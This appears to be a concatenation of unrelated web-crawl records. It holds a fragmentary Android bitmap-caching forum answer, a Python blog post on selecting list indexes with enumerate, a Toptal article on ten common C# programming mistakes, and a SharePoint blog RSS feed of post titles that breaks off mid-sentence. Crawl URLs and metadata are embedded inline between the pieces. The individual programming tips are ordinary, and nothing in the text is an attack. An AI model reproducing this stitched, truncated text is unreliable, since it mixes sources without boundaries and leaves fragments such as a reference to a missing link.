It’s related to image caching, asycTask processing, background download from net etc.
Please read this page:
If you download and look into the sample project bitmapfun on that page, I trust it will solve all your problem. That’s a perfect sample. | http://babe.ilandroid.com/bitmapfactory-options-inbitmap-causes-tearing-when-switching-imageview-bitmap-often.html | CC-MAIN-2018-30 | en | refinedweb |
Python: Selecting certain indexes in an array
A couple of days ago I was scrapping the UK parliament constituencies from Wikipedia in preparation for the Graph Connect hackathon and had got to the point where I had an array with one entry per column in the table.

import requests from bs4 import BeautifulSoup from soupselect import select page = open("constituencies.html", 'r') soup = BeautifulSoup(page.read()) for row in select(soup, "table.wikitable tr"): if select(row, "th"): print [cell.text for cell in select(row, "th")] if select(row, "td"): print [cell.text for cell in select(row, "td")]
$ python blog.py [u'Constituency', u'Electorate (2000)', u'Electorate (2010)', u'Largest Local Authority', u'Country of the UK'] [u'Aldershot', u'66,499', u'71,908', u'Hampshire', u'England'] [u'Aldridge-Brownhills', u'58,695', u'59,506', u'West Midlands', u'England'] [u'Altrincham and Sale West', u'69,605', u'72,008', u'Greater Manchester', u'England'] [u'Amber Valley', u'66,406', u'69,538', u'Derbyshire', u'England'] [u'Arundel and South Downs', u'71,203', u'76,697', u'West Sussex', u'England'] [u'Ashfield', u'74,674', u'77,049', u'Nottinghamshire', u'England'] [u'Ashford', u'72,501', u'81,947', u'Kent', u'England'] [u'Ashton-under-Lyne', u'67,334', u'68,553', u'Greater Manchester', u'England'] [u'Aylesbury', u'72,023', u'78,750', u'Buckinghamshire', u'England'] ...
I wanted to get rid of the 2nd and 3rd columns (containing the electorates) from the array since those aren't interesting to me as I have another source where I've got that data from.
I was struggling to do this but two different Stack Overflow questions came to the rescue with suggestions to use enumerate to get the index of each column and then add to the list comprehension to filter appropriately.
First we'll look at the filtering on a simple example. Imagine we have a list of 5 people:
people = ["mark", "michael", "brian", "alistair", "jim"]
And we only want to keep the 1st, 4th and 5th people. We therefore only want to keep the values that exist in index positions 0,3 and 4 which we can do like this: ~~~python >>> [x[1] for x in enumerate(people) if x[0] in [0,3,4]] ['mark', 'alistair', 'jim'] ~~~
Now let's apply the same approach to our constituencies data set:
import requests from bs4 import BeautifulSoup from soupselect import select page = open("constituencies.html", 'r') soup = BeautifulSoup(page.read()) for row in select(soup, "table.wikitable tr"): if select(row, "th"): print [entry[1].text for entry in enumerate(select(row, "th")) if entry[0] in [0,3,4]] if select(row, "td"): print [entry[1].text for entry in enumerate(select(row, "td")) if entry[0] in [0,3,4]]
$ python blog.py [u'Constituency', u'Largest Local Authority', u'Country of the UK'] [u'Aldershot', u'Hampshire', u'England'] [u'Aldridge-Brownhills', u'West Midlands', u'England'] [u'Altrincham and Sale West', u'Greater Manchester', u'England'] [u'Amber Valley', u'Derbyshire', u'England'] [u'Arundel and South Downs', u'West Sussex', u'England'] [u'Ashfield', u'Nottinghamshire', u'England'] [u'Ashford', u'Kent', u'England'] [u'Ashton-under-Lyne', u'Greater Manchester', u'England'] [u'Aylesbury', u'Buckinghamshire', u'England']
About the author
Mark Needham is a Developer Relations Engineer for Neo4j, the world's leading graph database. | https://markhneedham.com/blog/2015/05/05/python-selecting-certain-indexes-in-an-array/ | CC-MAIN-2018-30 | en | refinedweb |
About C Sharp.
C# is an object oriented, strongly-typed language. The strict type checking in C#, both at compile and run times, results in the majority of typical C# programming errors being reported as early as possible, and their locations pinpointed quite accurately. This can save a lot of time in C Sharp programming, compared to tracking down the cause of puzzling errors which can occur long after the offending operation takes place in languages which are more liberal with their enforcement of type safety. However, a lot of C# coders unwittingly (or carelessly) throw away the benefits of this detection, which leads to some of the issues discussed in this C# tutorial.
About This C Sharp Programming Tutorial
This tutorial describes 10 of the most common C# programming mistakes made, or problems to be avoided, by C# programmers and provide them with help.
While most of the mistakes discussed in this article are C# specific, some are also relevant to other languages that target the CLR or make use of the Framework Class Library (FCL).
Common C# Programming Mistake #1: Using a reference like a value or vice versa those trying to learn C# programming.
If you don’t know whether the object you’re using is a value type or reference type, you could run into some surprises. For example:
As you can see, both the
Point and
Pen objects were created the exact same way, but the value of
point1 remained unchanged when a new
X coordinate value was assigned to
point2, whereas the value of
pen1 was modified when a new color was assigned to
pen2. We can therefore deduce that
point1 and
point2 each contain their own copy of a
Point object, whereas
pen1 and
pen2 contain references to the same
Pen object. But how can we know that without doing this experiment?
The answer is to look at the definitions of the object types (which you can easily do in Visual Studio by placing your cursor over the name of the object type and pressing F12):
public struct Point { ... } // defines a “value” type public class Pen { ... } // defines a “reference” type
As shown above, in C# programming, the
struct keyword is used to define a value
type, while the
class keyword is used to define a reference type. For
those with a C++ background, who were lulled into a false sense of
security by the many similarities between C++ and C# keywords, this
behavior likely comes as a surprise that may have you asking for help from a C# tutorial.
If you’re going to depend on some behavior which differs between value and reference types – such as the ability to pass an object as a method parameter and have that method change the state of the object – make sure that you’re dealing with the correct type of object to avoid C# programming problems.
Common C# Programming Mistake #2: Misunderstanding default values for uninitialized variables
In C#, value types can’t be null. By definition, value types have a value, and even uninitialized variables of value types must have a value. This is called the default value for that type. This leads to the following, usually unexpected result when checking if a variable is uninitialized:
class Program { static Point point1; static Pen pen1; static void Main(string[] args) { Console.WriteLine(pen1 == null); // True Console.WriteLine(point1 == null); // False (huh?) } }
Why isn’t
point1 null? The answer is that
Point is a value type, and the
default value for a
Point is (0,0), not null. Failure to recognize this
is a very easy (and common) mistake to make in C#.
Many (but not all) value types have an
IsEmpty property which you can
check to see if it is equal to its default value:
Console.WriteLine(point1.IsEmpty); // True
When you’re checking to see if a variable has been initialized or not, make sure you know what value an uninitialized variable of that type will have by default and don’t rely on it being null..
Common C# Programming Mistake #3: Using improper or unspecified string comparison methods
There are many different ways to compare strings in C#.
Although many programmers use the
== operator for string comparison, it
is actually one of the least desirable methods to employ, primarily
because it doesn’t specify explicitly in the code which type of
comparison is wanted.
Rather, the preferred way to test for string equality in C# programming is with the
Equals method:
public bool Equals(string value); public bool Equals(string value, StringComparison comparisonType);
The first method signature (i.e., without the
comparisonType parameter),
is actually the same as using the
== operator, but has the benefit of
being explicitly applied to strings. It performs an ordinal comparison
of the strings, which is basically a byte-by-byte comparison. In many
cases this is exactly the type of comparison you want, especially when
comparing strings whose values are set programmatically, such as file
names, environment variables, attributes, etc. In these cases, as long
as an ordinal comparison is indeed the correct type of comparison for
that situation, the only downside to using the
Equals method without a
comparisonType is that somebody reading the code may not know what type
of comparison you’re making.. For example:
string s = "strasse"; // outputs False: Console.WriteLine(s == "straße"); Console.WriteLine(s.Equals("straße")); Console.WriteLine(s.Equals("straße", StringComparison.Ordinal)); Console.WriteLine(s.Equals("Straße", StringComparison.CurrentCulture)); Console.WriteLine(s.Equals("straße", StringComparison.OrdinalIgnoreCase)); // outputs True: Console.WriteLine(s.Equals("straße", StringComparison.CurrentCulture)); Console.WriteLine(s.Equals("Straße", StringComparison.CurrentCultureIgnoreCase));
The safest practice is to always provide a
comparisonType parameter to
the
Equals method. Here are some basic guidelines:
- When comparing strings that were input by the user, or are to be displayed to the user, use a culture-sensitive comparison (
CurrentCultureor
CurrentCultureIgnoreCase).
- When comparing programmatic strings, use ordinal comparison (
Ordinalor
OrdinalIgnoreCase).
InvariantCultureand
InvariantCultureIgnoreCaseare. This method is preferable
to the
<,
<=,
> and
>= operators, for the same reasons as discussed
above–to avoid C# problems.
Common C# Programming Mistake #4: Using iterative (instead of declarative) statements to manipulate collections
In C# 3.0, the addition of Language-Integrated Query (LINQ) to the language changed forever the way collections are queried and manipulated. Since then, if you’re using iterative statements to manipulate collections, you didn’t use LINQ when you probably should have.
Some C# programmers don’t even know of LINQ’s existence, but fortunately that number is becoming increasingly small. Many still think, though, that because of the similarity between LINQ keywords and SQL statements, its only use is in code that queries databases.
While database querying is a very prevalent use of LINQ statements, they actually work over any enumerable collection (i.e., any object that implements the IEnumerable interface). So for example, if you had an array of Accounts, instead of writing a C# List foreach:
decimal total = 0; foreach (Account account in myAccounts) { if (account.Status == "active") { total += account.Balance; } }
you could just write:
decimal total = (from account in myAccounts where account.Status == "active" select account.Balance).
Common C# Programming Mistake #5: Failing to consider the underlying objects in a LINQ statement
LINQ is great for abstracting the task of manipulating collections, whether they are in-memory objects, database tables, or XML documents. In a perfect world, you wouldn’t need to know what the underlying objects are. But the error here is assuming we live in a perfect world. In fact, identical LINQ statements can return different results when executed on the exact same data, if that data happens to be in a different format.
For instance, consider the following statement:
decimal total = (from account in myAccounts where account.Status == "active" select account.Balance).Sum();
What happens if one of the object’s
account.Status equals “Active” (note
the capital A)?. When we talked about string comparison earlier, we
saw that the
== operator performed an ordinal comparison of strings. So
why in this case is the
== operator performing a case-insensitive
comparison?
The answer is that when the underlying objects in a LINQ statement are references to SQL table data (as is the case with the Entity Framework DbSet object in this example), the statement is converted into a T-SQL statement..
Common C# Programming Mistake #6: Getting confused or faked out by extension methods
As mentioned earlier, LINQ statements work on any object that implements IEnumerable. For example, the following simple function will add up the balances on any collection of accounts:
public decimal SumAccounts(IEnumerable<Account> myAccounts) { return myAccounts.Sum(a => a.Balance); }
In the above code, the type of the myAccounts parameter is declared as
IEnumerable<Account>. Since
myAccounts references a
Sum method (C#
uses the familiar “dot notation” to reference a method on a class or
interface), we’d expect to see a method called
Sum() on the definition
of the
IEnumerable<T> interface. However, the definition of
IEnumerable<T>, makes no reference to any
Sum method and simply looks
like this:
public interface IEnumerable<out T> : IEnumerable { IEnumerator<T> GetEnumerator(); }
So where is the
Sum() method defined?. Rather, it is a static method (called an
“extension method”) that is defined on the
System.Linq.Enumerable class:
namespace System.Linq { public static class Enumerable { ... // the reference here to “this IEnumerable<TSource> source” is // the magic sauce that provides access to the extension method Sum public static decimal Sum<TSource>(this IEnumerable<TSource> source, Func<TSource, decimal> selector); ... } }
So what makes an extension method different from any other static method and what enables us to access it in other classes?
The distinguishing characteristic of an extension method is the
this modifier on its first parameter. This is the “magic” that
identifies it to the compiler as an extension method. The type of the
parameter it modifies (in this case
IEnumerable<TSource>) denotes the
class or interface which will then appear to implement this method.
(As a side point, there’s nothing magical about the similarity between
the name of the
IEnumerable interface and the name of the
Enumerable class on which the extension method is defined. This
similarity is just an arbitrary stylistic choice.)
With this understanding, we can also see that the
sumAccounts function
we introduced above could instead have been implemented as follows:
public decimal SumAccounts(IEnumerable<Account> myAccounts) { return Enumerable.Sum(myAccounts, a => a.Balance); }
The fact that we could have implemented it this way instead raises the question of why have extension methods at all? Extension methods are essentially a convenience of the C# programming language that enables you to “add” methods to existing types without creating a new derived type, recompiling, or otherwise modifying the original type.
Extension methods are brought into scope by including a
using [namespace]; statement at the top of the file. You need to know which
C# namespace includes the extension methods you’re looking for, but that’s
pretty easy to determine once you know what it is you’re searching for.
When the C# compiler encounters a method call on an instance of an object, and doesn’t find that method defined on the referenced object class, it then looks at all extension methods that are within scope to try to find one which matches the required method signature and class. If it finds one, it will pass the instance reference as the first argument to that extension method, then the rest of the arguments, if any, will be passed as subsequent arguments to the extension method. (If the C# compiler doesn’t find any corresponding extension method within scope, it will throw an error.)
Extension methods are an example of “syntactic sugar” on the part of the C# compiler, which allows us to write code that is (usually) clearer and more maintainable. Clearer, that is, if you’re aware of their usage. Otherwise, it can be a bit confusing, especially at first.
While there certainly are advantages to using extension methods, they can cause problems and a cry for C# programming help for those developers who aren’t aware of them or don’t properly understand them. This is especially true when looking at code samples online, or at any other pre-written code. When such code produces compiler errors (because it invokes methods that clearly aren’t defined on the classes they’re invoked on), the tendency is to think the code applies to a different version of the library, or to a different library altogether. A lot of time can be spent searching for a new version, or phantom “missing library”, that doesn’t exist.
Even developers who are familiar with extension methods still get caught occasionally, when there is a method with the same name on the object, but its method signature differs in a subtle way from that of the extension method. A lot of time can be wasted looking for a typo or error that just isn’t there.
Use of extension methods in C# libraries is becoming increasingly prevalent. In addition to LINQ, the Unity Application Block and the Web API framework are examples of two heavily-used modern libraries by Microsoft which make use of extension methods as well, and there are many others. The more modern the framework, the more likely it is that it will incorporate extension methods.
Of course, you can write your own extension methods as well. Realize, however, that while extension methods appear to get invoked just like regular instance methods, this is really just an illusion. In particular, your extension methods can’t reference private or protected members of the class they’re extending and therefore cannot serve as a complete replacement for more traditional class inheritance.
Common C# Programming Mistake #7: Using the wrong type of collection for the task at hand
C# provides a large variety of collection objects, with the following
being only a partial list:
Array,
ArrayList,
BitArray,
BitVector32,
Dictionary<K,V>,
HashTable,
HybridDictionary,
List<T>,
NameValueCollection,
OrderedDictionary,
Queue, Queue<T>,
SortedList,
Stack, Stack<T>,
StringCollection,
StringDictionary.
While there can be cases where too many choices is as bad as not enough choices, that isn’t the case with collection objects. The number of options available can definitely work to your advantage. Take a little extra time upfront to research and choose the optimal collection type for your purpose. It will likely result in better performance and less room for error.
If there’s a collection type specifically targeted at the type of element you have (such as string or bit) lean toward using that one first. The implementation is generally more efficient when it’s targeted to a specific type of element.
To take advantage of the type safety of C#, you should usually prefer a generic interface over a non-generic one. The elements of a generic interface are of the type you specify when you declare your object, whereas the elements of non-generic interfaces are of type object. When using a non-generic interface, the C# compiler can’t type-check your code. Also, when dealing with collections of primitive value types, using a non-generic collection will result in repeated boxing/unboxing of those types, which can result in a significant negative performance impact when compared to a generic collection of the appropriate type.
Another common C# problem is to write your own collection object. That isn’t to say it’s never appropriate, but with as comprehensive a selection as the one .NET offers, you can probably save a lot of time by using or extending one that already exists, rather than reinventing the wheel. In particular, the C5 Generic Collection Library for C# and CLI offers a wide array of additional collections “out of the box”, such as persistent tree data structures, heap based priority queues, hash indexed array lists, linked lists, and much more.
Common C# Programming Mistake #8: Neglecting to free resources
The CLR environment employs a garbage collector, so you don’t need to
explicitly free the memory created for any object. In fact, you can’t.
There’s no equivalent of the C++
delete operator or the
free() function
in C . But that doesn’t mean that you can just forget about all objects
after you’re done using them. Many types of objects encapsulate some
other type of system resource (e.g., a disk file, database connection,
network socket, etc.). Leaving these resources open can quickly deplete
the total number of system resources, degrading performance and
ultimately leading to program faults.
While a destructor method can be defined on any C# class, the problem
with destructors (also called finalizers in C#) is that you can’t know
for sure when they will be called. They are called by the garbage
collector (on a separate thread, which can cause additional
complications) at an indeterminate time in the future. Trying to get
around these limitations by forcing garbage collection with
GC.Collect() is not a C# best practice, as that will block the thread for
an unknown amount of time while it collects all objects eligible for
collection.
This is not to say there are no good uses for finalizers, but freeing resources in a deterministic way isn’t one of them. Rather, when you’re operating on a file, network or database connection, you want to explicitly free the underlying resource as soon as you are done with it.
Resource leaks are a concern in almost any environment. However, C#
provides a mechanism that is robust and simple to use which, if
utilized, can make leaks a much rarer occurrence. The .NET framework
defines the
IDisposable interface, which consists solely of the
Dispose() method. Any object which implements
IDisposable expects to
have that method called whenever the consumer of the object is finished
manipulating it. This results in explicit, deterministic freeing of
resources.
If you are creating and disposing of an object within the context of a
single code block, it is basically inexcusable to forget to call
Dispose(), because C# provides a
using statement that will ensure
Dispose() gets called no matter how the code block is exited (whether it
be an exception, a return statement, or simply the closing of the
block). And yes, that’s the same
using statement mentioned previously that is used to include C# namespaces at the top of your file. It
has a second, completely unrelated purpose, which many C# developers
are unaware of; namely, to ensure that
Dispose() gets called on an
object when the code block is exited:
using (FileStream myFile = File.OpenRead("foo.txt")) { myFile.Read(buffer, 0, 100); }
By creating a
using block in the above example, you know for sure that
myFile.Dispose() will be called as soon as you’re done with the file,
whether or not
Read() throws an exception.
Common C# Programming Mistake #9: Shying away from exceptions
C# continues its enforcement of type safety into runtime. This allows you to pinpoint many types of errors in C# much more quickly than in languages such as C++, where faulty type conversions can result in arbitrary values being assigned to an object’s fields. However, once again, programmers can squander this great feature, leading to C# problems. They fall into this trap because C# provides two different ways of doing things, one which can throw an exception, and one which won’t. Some will shy away from the exception route, figuring that not having to write a try/catch block saves them some coding.
For example, here are two different ways to perform an explicit type cast in C#:
// METHOD 1: // Throws an exception if account can't be cast to SavingsAccount SavingsAccount savingsAccount = (SavingsAccount)account; // METHOD 2: // Does NOT throw an exception if account can't be cast to // SavingsAccount; will just set savingsAccount to null instead SavingsAccount savingsAccount = account as SavingsAccount;
The most obvious error that could occur with the use of Method 2 would
be a failure to check the return value. That would likely result in an
eventual NullReferenceException, which could possibly surface at a much
later time, making it much harder to track down the source of the
problem. In contrast, Method 1 would have immediately thrown an
InvalidCastException making the source of the problem much more
immediately obvious.
Moreover, even if you remember to check the return value in Method 2, what are you going to do if you find it to be null? Is the method you’re writing an appropriate place to report an error? Is there something else you can try if that cast fails? If not, then throwing an exception is the correct thing to do, so you might as well let it happen as close to the source of the problem as possible.
Here are a couple of examples of other common pairs of methods where one throws an exception and the other does not:
int.Parse(); // throws exception if argument can’t be parsed int.TryParse(); // returns a bool to denote whether parse succeeded IEnumerable.First(); // throws exception if sequence is empty IEnumerable.FirstOrDefault(); // returns null/default value if sequence is empty
Some C# developers are so “exception adverse” that they automatically assume the method that doesn’t throw an exception is superior. While there are certain select cases where this may be true, it is not at all correct as a generalization.
As a specific example, in a case where you have an alternative legitimate (e.g., default) action to take if an exception would have been generated, then that the non-exception approach could be a legitimate choice. In such a case, it may indeed be better to write something like this:
if (int.TryParse(myString, out myInt)) { // use myInt } else { // use default value }
instead of:
try { myInt = int.Parse(myString); // use myInt } catch (FormatException) { // use default value }
However, it is incorrect to assume that
TryParse is therefore
necessarily the “better” method. Sometimes that’s the case, sometimes
it’s not. That’s why there are two ways of doing it. Use the correct one
for the context you are in, remembering that exceptions can certainly be
your friend as a developer.
Common C# Programming Mistake #10: Allowing compiler warnings to accumulate
While this problem is definitely not C# specific, it is particularly egregious in C# programming since it abandons the benefits of the strict type checking offered by the C# compiler.
Warnings are generated for a reason. While all C# compiler errors signify a defect in your code, many warnings do as well. What differentiates the two is that, in the case of a warning, the compiler has no problem emitting the instructions your code represents. Even so, it finds your code a little bit fishy, and there is a reasonable likelihood that your code doesn’t accurately reflect your intent.
A common simple example for the sake of this C# programming tutorial is when you modify your algorithm to eliminate the use of a variable you were using, but you forget to remove the variable declaration. The program will run perfectly, but the compiler will flag the useless variable declaration. The fact that the program runs perfectly causes programmers to neglect to fix the cause of the warning. Furthermore, coders take advantage of a Visual Studio feature which makes it easy for them to hide the warnings in the “Error List” window so they can focus only on the errors. It doesn’t take long until there are dozens of warnings, all of them blissfully ignored (or even worse, hidden).
But if you ignore this type of warning, sooner or later, something like this may very well find its way into your code:
class Account { int myId; int Id; // compiler warned you about this, but you didn’t listen! // Constructor Account(int id) { this.myId = Id; // OOPS! } }
And at the speed Intellisense allows us to write code, this error isn’t as improbable as it looks.
You now have a serious error in your program (although the compiler has only flagged it as a warning, for the reasons already explained), and depending on how complex your program is, you could waste a lot of time tracking this one down. Had you paid attention to this warning in the first place, you would have avoided this problem with a simple five-second fix.
Remember, the C Sharp compiler gives you a lot of useful information about the robustness of your code… if you’re listening. Don’t ignore warnings. They usually only take a few seconds to fix, and fixing new ones when they happen can save you hours. Train yourself to expect the Visual Studio “Error List” window to display “0 Errors, 0 Warnings”, so that any warnings at all make you uncomfortable enough to address them immediately.
Of course, there are exceptions to every rule. Accordingly, there may
be times when your code will look a bit fishy to the compiler, even
though it is exactly how you intended it to be. In those very rare
cases, use
#pragma warning disable [warning id] around only the code
that triggers the warning, and only for the warning ID that it triggers.
This will suppress that warning, and that warning only, so that you can
still stay alert for new ones.
Wrap-up
C#”.
Using a C Sharp tutorial like this one to familiarize oneself with the key nuances of C#, such as (but by no means limited to) the problems raised in this article, will help in C# optimization while avoiding some of its more common pitfalls of the language.
Understanding the Basics
What is C#?
C# is one of several programming languages that target the Microsoft CLR, which automatically gives it the benefits of cross-language integration and exception handling, enhanced security, a simplified model for component interaction, and debugging and profiling services.
What is the difference between C++ and C#?
C++ and C# are two completely different languages, despite similarities in name and syntax. C# was designed to be somewhat higher-level than C++, and the two languages also take different approaches to details like who determines whether a parameter is passed by reference or by value.
Why is C# used?
C# is used for many reasons, but the benefits of the Microsoft CLR tool set and a large developer community are two main draws to the language. | https://www.toptal.com/c-sharp/top-10-mistakes-that-c-sharp-programmers-make | CC-MAIN-2018-30 | en | refinedweb |
printf Example
Part of TutorialFundamentals
It's better to use writef these days, but here's a printf example just for the heck of it.
int main(char[][] args) { printf("Hello World\n"); return 0; }
Here's the same thing with writef:
import std.stdio; int main(char[][] args) { writefln("Hello World"); return 0; }
However when using the %s formatting token with printf you must be careful to use it with the embedded length qualifier. This is because the difference between C++ and D is that C++ strings are zero-terminated character arrays referenced by an address, but in D they are a dynamic array object which is really an eight-byte structure containing length and pointer.
int main(char[][] args) { printf("%.*s\n", args[0]); // printf("%s\n", args[0]); // <<-- This will fail. return 0; } | http://dsource.org/projects/tutorials/wiki/PrintfExample | CC-MAIN-2018-30 | en | refinedweb |
Another question that often arises is whether to use raw or cooked files. The answer here is very simple: Use cooked files. The only time to use raw files is for OPS as it is a key requirement.
Raw files offer two performance improvements: asynchronous I/O and no double-caching (i.e., caching of data in Oracle SGA and UNIX file system cache). Quite often, the realized performance gain is relatively small. Some sources say 5?10%, while others wildly claim 50%. There really is no universal consensus on what the real performance gains are for using raw files. However, nearly everyone agrees that raw generally requires more skilled and well-trained administrative staff because none of the standard UNIX file system commands and many backup/recovery suites do not function with raw files. Thus, the administrative headaches alone are reason enough to avoid raw files like the plague.
Again, if you've accepted the prior recommendation for Sun hardware, then there is a clear answer: Use cooked files. Solaris supports asynchronous I/O to both raw and file system data files. The only real penalty is double-caching of data.
If you genuinely believe that you need the performance gain raw files supposedly offer, then I strongly suggest looking at the Veritas file system with its Quick IO feature. Quick IO supports asynchronous I/O and eliminates double-caching. In short, Oracle accesses database files as if they were raw even though the DBA manages them as if they were regular files. Essentially, Quick IO provides a character-mode device driver and a file system namespace mechanism. For more information, I suggest reading the white paper titled "Veritas Quick IO: Equivalent to raw volumes, yet easier." It can be found on Veritas' Web site (, under white papers).
The Veritas file system also supports online file system backups, which can be used to perform online incremental database backups. Furthermore, Veritas' online incremental backup is vastly superior to using Oracle's RMAN. The key difference is that Oracle's RMAN must scan all the blocks during an online incremental database backup to see which blocks have changed. RMAN saves magnetic tapes at the expense of time. The Veritas online incremental database backup knows which blocks have changed via its file system redo logs, so it saves both tape space and time. Finally, Veritas offers one of the easiest to manage UNIX file systems and backup/recovery suites available. Unfortunately, Veritas is only available for Solaris and HP-UX.
As another point of reference, I did my last data warehouse using raw files. I also do not own any shares of Veritas stock. And, I honestly do not feel like I am making this recommendation based on any personal prejudices. | http://etutorials.org/SQL/oracle+dba+guide+to+data+warehousing+and+star+schemas/Chapter+3.+Hardware+Architecture/The+Raw+vs.+Cooked+Files+Debate/ | CC-MAIN-2018-30 | en | refinedweb |
Steven Van de Craen's Blog feed for the Posts list.en-US2018-07-15T18:23:40-07:00Subscribe with BloglinesSubscribe with GoogleSubscribe with Live.com Van de Craen's Blog sync client and green locks (read-only sync) 365SharePointOneDriveContent TypesPnPTroubleshootingSteven Van de Craen2017-12-07T07:31:07-08:00The issue foll... (More)<img src="" height="1" width="1" alt=""/> 10 Creators Update: Slow wireless connection Van de Craen2017-05-08T04:07:07-07:00A... (More)<img src="" height="1" width="1" alt=""/> GetTermSets Failed to compare two elements in the array Van de Craen2016-12-23T08:36:51-08:00This sys... (More)<img src="" height="1" width="1" alt=""/> - Upgrading SharePoint - Some views not upgraded to XsltListViewWebPart Van de Craen2016-08-24T08:03:00-07:00The old st... (More)<img src="" height="1" width="1" alt=""/> 2013: InfoPath client forms may open twice [Oct15CU bug] Van de Craen2015-12-16T12:47:00-08:00Oops After a recent Patch Night one of my customers had pulled in SharePoint updates along with Windows Updates and people started complaining about changed behavior PDF files no longer immediately open in the browser. Instead the PDF client (Adobe Reader) opens up and provides rich integration with... (More)<img src="" height="1" width="1" alt=""/> 2013: Programmatically set crawl cookies for forms authenticated web sites Van de Craen2015-08-29T00:54:29-07:00Last week I was having difficulties in crawling forms authenticated web sites. When configuring a crawl rule to store the authentication cookies the login page was returning multiple cookies with same name but different domain. This gave issues in a later stage (during crawl) because all cookies... (More)<img src="" height="1" width="1" alt=""/> 2013: Some observations on Enterprise Search Van de Craen2015-08-13T09:44:08-07:00I’m doing some testing with the Enterprise Search in SharePoint 2013 for a customer scenario and here are some observations… Content Source as Crawled Property The “Content Source” name is out of the box available as Managed Property on all content in the search index This makes it possible t... (More)<img src="" height="1" width="1" alt=""/>: Portal navigation limited to 50 dynamic items Van de Craen2015-08-12T04:07:28-07:00Is... (More)<img src="" height="1" width="1" alt=""/>: Users cannot create new subsites Van de Craen2015-07-13T10:02:49-07:00Issue “Sit... (More)<img src="" height="1" width="1" alt=""/> 2013: Open PDF files in client application Van de Craen2015-06-26T09:23:14-07:00Share colleagu... (More)<img src="" height="1" width="1" alt=""/> 2013: Enable 'Change Item Order' Ribbon Action Van de Craen2015-06-04T10:00:00-07:00My S... (More)<img src="" height="1" width="1" alt=""/> site collections from explicit managed path to wildcard managed path Van de Craen2015-03-14T00:41:20-07:00 o... (More)<img src="" height="1" width="1" alt=""/> Publishing Feature activation failed Van de Craen2014-12-16T07:19:22-08:00Last week I ran into an issue while reactivating the Publishing Feature on webs in a migrated (Dutch) site collection. If you have ever upgraded localized SharePoint 2007 Publishing sites this should sound familiar to you. What happens is that while in SharePoint 2007 the Pages library was called “P... (More)<img src="" height="1" width="1" alt=""/>: Rendering inside iframes ServicesOffice Web ApplicationsInfoPathSteven Van de Craen2014-10-31T09:35:00-07:00This-hos... (More)<img src="" height="1" width="1" alt=""/> a Summary Links Web Part: List does not exist 365TroubleshootingSteven Van de Craen2014-10-23T08:23:12-07:00Issue i... (More)<img src="" height="1" width="1" alt=""/> 2013: Bulk Content Approval of list items fails if user has read permissions on the web 365TroubleshootingSteven Van de Craen2014-10-17T09:51:42-07:00Update 6/08/2015 Issue is still present in May 2015 Cumulative Update and July 2015 Cumulative Update. Will contact Microsoft on this. 3/12/2014 Microsoft has confirmed this issue and will roll out a fix in the next Cumulative Update. Issue Last week I was notified of an issue wher... (More)<img src="" height="1" width="1" alt=""/> 2013 Web Applications requests not logged to ULS logs Van de Craen2014-10-16T15:04:23-07:00Issue m... (More)<img src="" height="1" width="1" alt=""/> 10 Technical Preview and Cisco AnyConnect Van de Craen2014-10-03T14:26:01-07:00Today I decided to look into Windows 10 Technical Preview without safety net and run it on my main work machine. No real issues so far, except connecting to our corporate network via Cisco AnyConnect (version 3.1.04059). Failed to initialize connection subsystem This can easily be resolved ... (More)<img src="" height="1" width="1" alt=""/> Server: allow multiple RDP sessions per user Van de Craen2014-10-02T04:56:09-07:00I’ve often worked on SharePoint environments where I accidentally got kicked or kicked others because we were working with the same account on the same server via Remote Desktop. By default each user is restricted to a single session but there’s a group policy to change this. In Windows Server 2008... (More)<img src="" height="1" width="1" alt=""/> web services in Nintex Workflow and different authentication mechanisms Van de Craen2014-09-12T13:40:06-07:00With the rise of claims based authentication in SharePoint we’ve faced new challenges in how to interact with web services hosted on those environments. Claims based authentication allows many different scenario’s with a mixture of Windows, Forms and SAML Authentication. When you’re working with ... (More)<img src="" height="1" width="1" alt=""/> and Content Databases Van de Craen2014-08-13T04:05:25-07:00Today I found a gotcha with the Restore-SPSite command when restoring “over” an existing Site Collection. The issue occurs if all Content Databases are at a maximum of their maximum Site Collection count. The error you’ll receive is that there is basically no room for the new Site Collection:... (More)<img src="" height="1" width="1" alt=""/> creating subsites when a built-in field is modified Van de Craen2014-06-30T07:26:43-07:00One of our site collections in a migration to SharePoint 2013 experienced an issue with creating sub sites: Sorry, something went wrong The URL 'SitePages/Home.aspx' is invalid. It may refer to a nonexistent file or folder, or refer to a valid file or folder that is not in the cur... (More)<img src="" height="1" width="1" alt=""/>: How to troubleshoot issues with Save as template Van de Craen2014-05-23T07:32:17-07:00On an upgrade project to SharePoint 2013 we ran into an issue where a specific site couldn’t be saved as a template (with or without content). You get the non-descriptive “Sorry, something went wrong” and “An unexpected error has occurred” messages. Funny enough the logged Correlation Id is totally ... (More)<img src="" height="1" width="1" alt=""/> SharePoint DCOM errors the easy way - revised Van de Craen2014-05-08T09:17:39-07:00Tagline: Fix your SharePoint DCOM issues with a single click ! - revised for Windows Server 2012 and User Account Control-enabled systems Update 8/05/2014: Scripts were revised to work with Windows Server 2008 R2 and Windows Server 2012 with User Account Control enabled. Original post&#... (More)<img src="" height="1" width="1" alt=""/> 2013: CreatePersonalSite fail when user license mapping incorrectly configured Van de Craen2014-05-05T06:49:14-07:00Last week I was troubleshooting a farm with ADFS where MySite creation failed. The ULS logs indicated that the user was not licensed to have a MySite. 04/29/2014 17:34:10.15 w3wp.exe (WS12-WFE1:0x031C) 0x1790 SharePoint Portal Server Personal Site Instantiation af1lc High Skipping cr... (More)<img src="" height="1" width="1" alt=""/> 2013: Workflows failing on start Van de Craen2014-04-29T05:10:30-07:00Recently I helped out a colleague with an issue in a load balanced SharePoint 2013 environment with Nintex Workflow 2013 on it. All the workflows that were started on WFE1 worked fine, but all started on WFE2 failed on start with the following issue logged to the SharePoint ULS logs: Load Wo... (More)<img src="" height="1" width="1" alt=""/> Saturday Belgium 2014 - Content Enrichment in SharePoint Search Van de Craen2014-04-28T08:06:22-07:00Last Saturday I delivered a session on “Content Enrichment in SharePoint Search” on the Belgian SharePoint Saturday 2014, showing how to configure it, its potential and some development tips and tricks. Although it was a very specific and narrow topic there was a big audience for it. We even had to ... (More)<img src="" height="1" width="1" alt=""/> 2013 search open in client 365Steven Van de Craen2014-03-26T09:26:43-07:00Issue SharePoint 2013 search results uses Excel Calculation Services to open workbooks found in the search results, despite having "open in client" specified on the Document Library and/or the Site Collection level. Notice the URL pointing to _layouts/xlviewer.aspx at the bottom of t... (More)<img src="" height="1" width="1" alt=""/> and PowerShell remoting Van de Craen2014-02-28T05:30:00-08:00In my current project I’m dabbling with PowerShell to query different servers and information from different SharePoint 2010 farms in the organization. This blog contains a brief overview of the steps I took in order to get 